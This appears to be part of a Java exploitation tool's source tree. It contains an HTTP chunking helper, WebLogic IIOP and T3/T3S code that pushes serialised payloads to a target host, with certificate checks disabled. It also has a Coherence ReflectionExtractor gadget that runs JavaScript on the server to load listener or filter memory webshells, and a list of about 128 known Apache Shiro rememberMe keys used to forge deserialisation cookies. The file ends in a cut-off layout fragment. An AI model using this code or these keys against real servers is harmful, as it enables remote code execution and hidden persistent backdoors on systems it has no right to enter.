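     * now treated like a negative value, i.e. a plain, un-chunked body.
     *
     * @param contentType media type of the body (may be {@code null})
     * @param content     raw bytes to send
     * @param chunkCount  piece size in bytes; {@code <= 0} disables chunking
     * @return the request body
     */
    public static RequestBody create(final MediaType contentType, final byte[] content, final int chunkCount) {
        if (chunkCount <= 0) {
            return RequestBody.create(contentType, content, 0, content.length);
        }
        return new RequestBody() {
            @Override
            public MediaType contentType() {
                return contentType;
            }

            @Override
            public void writeTo(BufferedSink sink) throws IOException {
                int start = 0;
                // do/while keeps the original behaviour of one (possibly empty) final write.
                do {
                    // long arithmetic so start + chunkCount cannot overflow for large chunk sizes
                    int end = (int) Math.min((long) start + chunkCount, content.length);
                    sink.write(content, start, end - start);
                    sink.flush();
                    start = end;
                } while (start < content.length);
            }
        };
    }

    /**
     * Body that streams {@code file} in pieces of {@code chunkCount} bytes, flushing after each
     * piece; {@code chunkCount <= 0} returns a plain OkHttp file body (0 previously looped forever).
     *
     * @param contentType media type of the body (may be {@code null})
     * @param file        file to send
     * @param chunkCount  piece size in bytes; {@code <= 0} disables chunking
     * @return the request body
     */
    public static RequestBody create(final MediaType contentType, final File file, final int chunkCount) {
        if (chunkCount <= 0) {
            return RequestBody.create(contentType, file);
        }
        else {
            return new RequestBody() {
                @Override
                public MediaType contentType() { return contentType; }

                @Override
                public void writeTo(BufferedSink sink) throws IOException {
                    BufferedSource source = null;
                    try {
                        source = Okio.buffer(Okio.source(file));
                        int endIndex = chunkCount;
                        // full chunks first; the remainder is written after the loop
                        while (file.length() > endIndex) {
                            byte[] data = source.readByteArray(chunkCount);
                            sink.write(data, 0, data.length);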
sink.flush();
                            endIndex += chunkCount;
                        }
                        // Bytes left after the last full chunk: exactly chunkCount when the size is a
                        // multiple of chunkCount, 0 for an empty file.
                        long lastCount = (long)chunkCount - ((long)endIndex - file.length());
                        byte[] data = source.readByteArray(lastCount);
                        sink.write(data, 0, data.length);
                        sink.flush();
                    }
                    finally {
                        Util.closeQuietly(source);
                    }
                }
            };
        }
    }
}

-------------------------------------------------------------------------------- /src/main/java/utils/weblogic/IIOPProtocolOperation.java: --------------------------------------------------------------------------------
package utils.weblogic;


import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.Hashtable;

/**
 * Delivers a payload object to a WebLogic server over IIOP by binding it into the server's
 * JNDI tree with {@code rebind}.
 */
public class IIOPProtocolOperation {
    /**
     * Connects to {@code iiop://ip:port} through WebLogic's initial context factory and rebinds
     * {@code payload} under a fresh, time-stamped name so repeated sends never collide.
     *
     * @param ip      target host
     * @param port    target IIOP port (kept as text; it is only interpolated into the URL)
     * @param payload object to bind; it is marshalled to the server as part of the rebind
     * @throws NamingException if the context cannot be created or the rebind fails
     */
    public static void send(String ip, String port, Object payload) throws NamingException {
        Hashtable<String, String> env = new Hashtable<String, String>();
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put("java.naming.provider.url", String.format("iiop://%s:%s", ip, port));

        Context ctx = new InitialContext(env);
        // NOTE(review): the context is never closed; the connection lingers until GC, as in the
        // original code.
        ctx.rebind("test" + System.nanoTime(), payload);
    }
}
-------------------------------------------------------------------------------- /src/main/java/utils/weblogic/T3ProtocolOperation.java: --------------------------------------------------------------------------------
package utils.weblogic;


import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.io.*;
import java.net.Socket;
import java.security.SecureRandom;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;

/** Raw T3/T3S transport used to push a serialised payload to a WebLogic server. */
public class T3ProtocolOperation {

    /**
     * Hex-encodes {@code src} (lower-case, two characters per byte).
     *
     * @param src bytes to encode
     * @return the hex string, or {@code null} for a {@code null} or empty input
     */
    public static String bytesToHexString(byte[] src) {
        StringBuilder stringBuilder
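= new StringBuilder("");
        if (src == null || src.length <= 0) {
            return null;
        }
        for (byte b : src) {
            int v = b & 0xFF;
            String hv = Integer.toHexString(v);
            // zero-pad single nibbles so every byte takes exactly two characters
            if (hv.length() < 2) {
                stringBuilder.append(0);
            }
            stringBuilder.append(hv);
        }
        return stringBuilder.toString();
    }

    /**
     * Decodes a hex string (either case) into bytes. An odd trailing nibble is ignored and
     * non-hex characters are not rejected (they decode through {@link #charToByte} as -1).
     *
     * @param hexString hex text
     * @return decoded bytes, or {@code null} for a {@code null} or empty input
     */
    public static byte[] hexStringToBytes(String hexString) {
        if (hexString == null || hexString.equals("")) {
            return null;
        }
        String upper = hexString.toUpperCase();
        int length = upper.length() / 2;
        char[] hexChars = upper.toCharArray();
        byte[] d = new byte[length];
        for (int i = 0; i < length; ++i) {
            int pos = i * 2;
            d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1]));
        }
        return d;
    }

    /** @return the value of one upper-case hex digit, or -1 when {@code c} is not one */
    private static byte charToByte(char c) {
        return (byte) "0123456789ABCDEF".indexOf(c);
    }

    /**
     * Java-serialises {@code ref}.
     *
     * @param ref object to serialise
     * @return the serialised bytes
     * @throws IOException if serialisation fails
     */
    public static byte[] serialize(Object ref) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(ref);
        // make the drain of ObjectOutputStream's internal buffer explicit before reading `out`
        objOut.flush();
        return out.toByteArray();
    }

    /**
     * Opens a T3 (or T3S) connection, sends the T3 greeting, prints the server's version and then
     * writes a pre-built T3 request frame with the serialised {@code payload} appended. Nothing
     * beyond the greeting line is read back.
     * <p>
     * Security notes, deliberate for an exploitation tool but worth knowing: for {@code t3s} the
     * server certificate is not validated at all (see {@link TrustManagerImpl}) and no hostname
     * verification is performed, so the connection can be intercepted.
     * <p>
     * Fixes: the socket used to be leaked after every call; a closed or non-T3 port (EOF instead
     * of a greeting) used to fail with a {@link NullPointerException}.
     *
     * @param protocol {@code "t3s"} (case-insensitive) for TLS, anything else for plain T3
     * @param host     target host
     * @param port     target port, as text
     * @param payload  serialised object to embed in the request frame
     * @throws Exception on connection failure, a missing greeting, or a TLS setup error
     */
    public static void send(String protocol, String host, String port, byte[] payload) throws Exception {
        int portNumber = Integer.parseInt(port);
        Socket socket;
        if (protocol.equalsIgnoreCase("t3s")) {
            // Trust-all context so self-signed / expired WebLogic certificates do not block the tool.
            SSLContext context = SSLContext.getInstance("SSL");
            context.init(null, new TrustManager[] {new TrustManagerImpl()}, new SecureRandom());
            SSLSocketFactory factory = context.getSocketFactory();
            socket = factory.createSocket(host, portNumber);
        }
        else {
            socket = new Socket(host, portNumber);
        }
        try {
            // T3 greeting. AS = abbreviation table size, HL = remote header length (the server
            // uses HL to skip the header).
            String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n";
            OutputStream out = socket.getOutputStream();
            out.write(header.getBytes());
            out.flush();

            BufferedReader br = new BufferedReader(new InputStreamReader(socket.getInputStream()));
            String versionInfo = br.readLine();
            if (versionInfo == null) {
                throw new IOException("no T3 greeting received from " + host + ":" + port);
            }
            versionInfo = versionInfo.replace("HELO:", "");
            versionInfo = versionInfo.replace(".false", "");
            System.out.println("WeblogicVersion: " + versionInfo);

            // Pre-built T3 request prefix (kept verbatim from the original implementation); the
            // serialised payload is appended and the whole frame is prefixed with its 4-byte length.
            String data1 = "016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000";
            String data2 = bytesToHexString(payload);
            String data = data1 + data2;
            data = String.format("%08x", (data.length() / 2 + 4)) + data;
            byte[] frame = hexStringToBytes(data);
            // The frame is written twice, as the original code did — presumably intentional for
            // the targeted WebLogic versions; TODO confirm before changing.
            out.write(frame);
            out.write(frame);
            out.flush();
        }
        finally {
            socket.close();
        }
    }

    /**
     * Trust manager that accepts every certificate chain. Intentional — the tool must reach
     * WebLogic instances with self-signed certificates — but it means a t3s connection gives no
     * authentication of the peer whatsoever.
     */
    static class TrustManagerImpl implements X509TrustManager {
        public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {}

        public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {}

        /** Fix: the {@link X509TrustManager} contract requires a non-null array; some providers NPE on {@code null}. */
        public X509Certificate[] getAcceptedIssuers() {
            return new X509Certificate[0];
        }
    }

}
-------------------------------------------------------------------------------- /src/main/java/utils/weblogic/WeblogicGadget.java: --------------------------------------------------------------------------------
package utils.weblogic;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.tangosol.util.extractor.ReflectionExtractor;
import core.enumtypes.PayloadType;
import core.memshell.WeblogicFilterMemShell;
import core.memshell.WeblogicListenerMemShell;

import javassist.CtClass;
import utils.Util;

/** Builds the Coherence {@link ReflectionExtractor} chain that the WebLogic payloads embed. */
public class WeblogicGadget {

    /**
     * Returns a four-step extractor chain ({@code getConstructor} → {@code newInstance} →
     * {@code getEngineByName("javascript")} → {@code eval(code)}) whose script defines the
     * selected memory-shell class on the target's context class loader and instantiates it.
     * The chain is presumably applied to a {@code ScriptEngineManager} class object supplied by
     * the surrounding gadget — TODO confirm against the callers.
     * <p>
     * Fix: an unsupported {@code type} used to leave {@code clazz} null and fail with an NPE; it
     * now throws {@link IllegalArgumentException}.
     *
     * @param type       which memory shell to embed (listener or filter)
     * @param trojanType currently unused by this method
     * @return the extractor chain, in execution order
     * @throws Exception from javassist when the class cannot be rewritten or serialised
     */
    public static ReflectionExtractor[] getReflectionExtractor(PayloadType type, String trojanType) throws Exception {
        CtClass clazz;
        switch (type) {
            case weblogiclistenermemshell:
                clazz = Util.addSuperClass(WeblogicListenerMemShell.class, AbstractTranslet.class.getName());
                break;
            case weblogicfiltermemshell:
                clazz = Util.addSuperClass(WeblogicFilterMemShell.class, AbstractTranslet.class.getName());
                break;
            default:
                throw new IllegalArgumentException("unsupported payload type for the WebLogic gadget: " + type);
        }
        // Unique class name per call so repeated injection into one JVM never hits a duplicate definition.
        clazz.replaceClassName(clazz.getName(), clazz.getName() + System.nanoTime());
        byte[] bytecodes = clazz.toBytecode();
        // toBytecode() freezes the CtClass; defrost() lets a later call modify it again.
        clazz.defrost();

        // JavaScript run by the target's script engine: decode the hex back to bytes, define the
        // class via the (normally inaccessible) ClassLoader.defineClass and instantiate it.
        String code = "var hex = '" + Util.bytesToHexString(bytecodes) + "';\n" +
                "hex = hex.length() % 2 != 0 ? \"0\" + hex : hex;\n" +
                "var b = new java.io.ByteArrayOutputStream();\n" +
                "for (var i = 0; i < hex.length() / 2; i++) {\n" +
                " var index = i * 2;\n" +
                " var v = java.lang.Integer.parseInt(hex.substring(index, index + 2), 16);\n" +
                " b.write(v);\n" +
                "};\n" +
                "b.close(); \n" +
                "var bytes = b.toByteArray(); \n" +
                "var classLoader = java.lang.Thread.currentThread().getContextClassLoader();\n" +
                "var method = java.lang.ClassLoader.class.getDeclaredMethod('defineClass', ''.getBytes().getClass(), java.lang.Integer.TYPE, java.lang.Integer.TYPE);\n" +
                "method.setAccessible(true);\n" +
                "var clazz = method.invoke(classLoader, bytes, 0, bytes.length);\n" +
                "clazz.newInstance();\n";

        ReflectionExtractor extractor1 = new ReflectionExtractor(
                "getConstructor",
                new Object[]{new Class[0]}
        );

        ReflectionExtractor extractor2 = new ReflectionExtractor(
                "newInstance",
                new Object[]{new Object[0]}
        );

        ReflectionExtractor extractor3 = new ReflectionExtractor(
                "getEngineByName",
                new Object[]{"javascript"}
        );

        ReflectionExtractor extractor4 = new ReflectionExtractor(
                "eval",
                new Object[]{code}
        );

        ReflectionExtractor[] extractors = {
                extractor1,
                extractor2,
                extractor3,
                extractor4
        };
        return extractors;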
} 72 | } 73 | -------------------------------------------------------------------------------- /src/main/resources/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: ui.Main 3 | 4 | -------------------------------------------------------------------------------- /src/main/resources/data/shiro_keys.txt: -------------------------------------------------------------------------------- 1 | 2AvVhdsgUs0FSA3SDFAdag== 2 | kPH+bIxk5D2deZiIxcaaaA== 3 | 3AvVhmFLUs0KTA3Kprsdag== 4 | 4AvVhmFLUs0KTA3Kprsdag== 5 | 5aaC5qKm5oqA5pyvAAAAAA== 6 | 6ZmI6I2j5Y+R5aSn5ZOlAA== 7 | bWljcm9zAAAAAAAAAAAAAA== 8 | wGiHplamyXlVB11UXWol8g== 9 | Z3VucwAAAAAAAAAAAAAAAA== 10 | MTIzNDU2Nzg5MGFiY2RlZg== 11 | zSyK5Kp6PZAAjlT+eeNMlg== 12 | U3ByaW5nQmxhZGUAAAAAAA== 13 | 5AvVhmFLUs0KTA3Kprsdag== 14 | bXdrXl9eNjY2KjA3Z2otPQ== 15 | fCq+/xW488hMTCD+cmJ3aQ== 16 | 1QWLxg+NYmxraMoxAXu/Iw== 17 | ZUdsaGJuSmxibVI2ZHc9PQ== 18 | L7RioUULEFhRyxM7a2R/Yg== 19 | r0e3c16IdVkouZgk1TKVMg== 20 | bWluZS1hc3NldC1rZXk6QQ== 21 | a2VlcE9uR29pbmdBbmRGaQ== 22 | WcfHGU25gNnTxTlmJMeSpw== 23 | ZAvph3dsQs0FSL3SDFAdag== 24 | tiVV6g3uZBGfgshesAQbjA== 25 | cmVtZW1iZXJNZQAAAAAAAA== 26 | ZnJlc2h6Y24xMjM0NTY3OA== 27 | RVZBTk5JR0hUTFlfV0FPVQ== 28 | WkhBTkdYSUFPSEVJX0NBVA== 29 | GsHaWo4m1eNbE0kNSMULhg== 30 | l8cc6d2xpkT1yFtLIcLHCg== 31 | KU471rVNQ6k7PQL4SqxgJg== 32 | 0AvVhmFLUs0KTA3Kprsdag== 33 | 1AvVhdsgUs0FSA3SDFAdag== 34 | 25BsmdYwjnfcWmnhAciDDg== 35 | 3JvYhmBLUs0ETA5Kprsdag== 36 | 6AvVhmFLUs0KTA3Kprsdag== 37 | 6NfXkC7YVCV5DASIrEm1Rg== 38 | 7AvVhmFLUs0KTA3Kprsdag== 39 | 8AvVhmFLUs0KTA3Kprsdag== 40 | 8BvVhmFLUs0KTA3Kprsdag== 41 | 9AvVhmFLUs0KTA3Kprsdag== 42 | OUHYQzxQ/W9e/UjiAGu6rg== 43 | a3dvbmcAAAAAAAAAAAAAAA== 44 | aU1pcmFjbGVpTWlyYWNsZQ== 45 | bXRvbnMAAAAAAAAAAAAAAA== 46 | OY//C4rhfwNxCQAQCrQQ1Q== 47 | 5J7bIJIV0LQSN3c9LPitBQ== 48 | f/SY5TIve5WWzT4aQlABJA== 49 | bya2HkYo57u6fWh5theAWw== 50 | WuB+y2gcHRnY2Lg9+Aqmqg== 51 | 3qDVdLawoIr1xFd6ietnwg== 
52 | YI1+nBV//m7ELrIyDHm6DQ== 53 | 6Zm+6I2j5Y+R5aS+5ZOlAA== 54 | 2A2V+RFLUs+eTA3Kpr+dag== 55 | 6ZmI6I2j3Y+R1aSn5BOlAA== 56 | SkZpbmFsQmxhZGUAAAAAAA== 57 | 2cVtiE83c4lIrELJwKGJUw== 58 | fsHspZw/92PrS3XrPW+vxw== 59 | XTx6CKLo/SdSgub+OPHSrw== 60 | sHdIjUN6tzhl8xZMG3ULCQ== 61 | O4pdf+7e+mZe8NyxMTPJmQ== 62 | HWrBltGvEZc14h9VpMvZWw== 63 | rPNqM6uKFCyaL10AK51UkQ== 64 | Y1JxNSPXVwMkyvES/kJGeQ== 65 | lT2UvDUmQwewm6mMoiw4Ig== 66 | MPdCMZ9urzEA50JDlDYYDg== 67 | xVmmoltfpb8tTceuT5R7Bw== 68 | c+3hFGPjbgzGdrC+MHgoRQ== 69 | ClLk69oNcA3m+s0jIMIkpg== 70 | Bf7MfkNR0axGGptozrebag== 71 | 1tC/xrDYs8ey+sa3emtiYw== 72 | ZmFsYWRvLnh5ei5zaGlybw== 73 | cGhyYWNrY3RmREUhfiMkZA== 74 | IduElDUpDDXE677ZkhhKnQ== 75 | yeAAo1E8BOeAYfBlm4NG9Q== 76 | cGljYXMAAAAAAAAAAAAAAA== 77 | 2itfW92XazYRi5ltW0M2yA== 78 | XgGkgqGqYrix9lI6vxcrRw== 79 | ertVhmFLUs0KTA3Kprsdag== 80 | 5AvVhmFLUS0ATA4Kprsdag== 81 | s0KTA3mFLUprK4AvVhsdag== 82 | hBlzKg78ajaZuTE0VLzDDg== 83 | 9FvVhtFLUs0KnA3Kprsdyg== 84 | d2ViUmVtZW1iZXJNZUtleQ== 85 | yNeUgSzL/CfiWw1GALg6Ag== 86 | NGk/3cQ6F5/UNPRh8LpMIg== 87 | 4BvVhmFLUs0KTA3Kprsdag== 88 | MzVeSkYyWTI2OFVLZjRzZg== 89 | empodDEyMwAAAAAAAAAAAA== 90 | A7UzJgh1+EWj5oBFi+mSgw== 91 | c2hpcm9fYmF0aXMzMgAAAA== 92 | i45FVt72K2kLgvFrJtoZRw== 93 | U3BAbW5nQmxhZGUAAAAAAA== 94 | Jt3C93kMR9D5e8QzwfsiMw== 95 | MTIzNDU2NzgxMjM0NTY3OA== 96 | vXP33AonIp9bFwGl7aT7rA== 97 | V2hhdCBUaGUgSGVsbAAAAA== 98 | Q01TX0JGTFlLRVlfMjAxOQ== 99 | Is9zJ3pzNh2cgTHB4ua3+Q== 100 | NsZXjXVklWPZwOfkvk6kUA== 101 | GAevYnznvgNCURavBhCr1w== 102 | 66v1O8keKNV3TTcGPK1wzg== 103 | SDKOLKn2J1j/2BHjeZwAoQ== 104 | kPH+bIxk5D2deZiIxcabaA== 105 | kPH+bIxk5D2deZiIxcacaA== 106 | 3AvVhdAgUs0FSA4SDFAdBg== 107 | 4AvVhdsgUs0F563SDFAdag== 108 | FL9HL9Yu5bVUJ0PDU1ySvg== 109 | 5RC7uBZLkByfFfJm22q/Zw== 110 | eXNmAAAAAAAAAAAAAAAAAA== 111 | fdCEiK9YvLC668sS43CJ6A== 112 | FJoQCiz0z5XWz2N2LyxNww== 113 | HeUZ/LvgkO7nsa18ZyVxWQ== 114 | HoTP07fJPKIRLOWoVXmv+Q== 115 | iycgIIyCatQofd0XXxbzEg== 116 | m0/5ZZ9L4jjQXn7MREr/bw== 117 | NoIw91X9GSiCrLCF03ZGZw== 
118 | oPH+bIxk5E2enZiIxcqaaA== 119 | QAk0rp8sG0uJC4Ke2baYNA== 120 | Rb5RN+LofDWJlzWAwsXzxg== 121 | s2SE9y32PvLeYo+VGFpcKA== 122 | SrpFBcVD89eTQ2icOD0TMg== 123 | U0hGX2d1bnMAAAAAAAAAAA== 124 | Us0KvVhTeasAm43KFLAeng== 125 | Ymx1ZXdoYWxlAAAAAAAAAA== 126 | YWJjZGRjYmFhYmNkZGNiYQ== 127 | zIiHplamyXlVB11UXWol8g== 128 | ZjQyMTJiNTJhZGZmYjFjMQ== 129 | -------------------------------------------------------------------------------- /src/main/resources/rmi.fxml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 |